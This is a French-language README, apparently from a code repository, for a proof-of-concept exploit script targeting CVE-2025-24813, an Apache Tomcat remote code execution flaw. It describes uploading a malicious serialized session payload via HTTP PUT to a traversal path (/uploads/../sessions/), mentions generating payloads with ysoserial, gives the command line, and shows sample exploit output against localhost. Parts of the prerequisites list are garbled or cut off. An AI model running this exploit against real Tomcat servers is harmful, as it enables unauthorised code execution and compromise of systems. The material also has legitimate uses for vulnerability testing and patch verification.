
Ce référentiel contient un script automatisé de preuve de concept (PoC) pour exploiter **CVE-2025-24813**, une vulnérabilité d'exécution de code à distance (RCE) dans Apache Tomcat. La vulnérabilité permet à un attaquant de télécharger une charge utile sérialisée malveillante sur le serveur, conduisant à une exécution de code arbitraire via la désérialisation lorsque des conditions spécifiques sont remplies.
CVE-2025-24813 est une vulnérabilité RCE théorique dans Apache Tomcat qui exploite une mauvaise gestion des fichiers de session téléchargés et des mécanismes de désérialisation. En téléchargeant une charge utile spécialement conçue dans un répertoire accessible en écriture (par exemple, /uploads/../sessions/), un attaquant peut déclencher une désérialisation, entraînant l'exécution de commandes arbitraires sur le serveur cible.
Pour que ce PoC exploite avec succès la vulnérabilité, les conditions suivantes doivent être remplies :
/index.jsp) et déclencher la désérialisation de la charge utile.ysoserial ou compiler des charges utiles Java.ysoserial, le fichier ysoserial.jar doit être disponible localement.python CVE-2025-24813.py <target_url> [options]
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser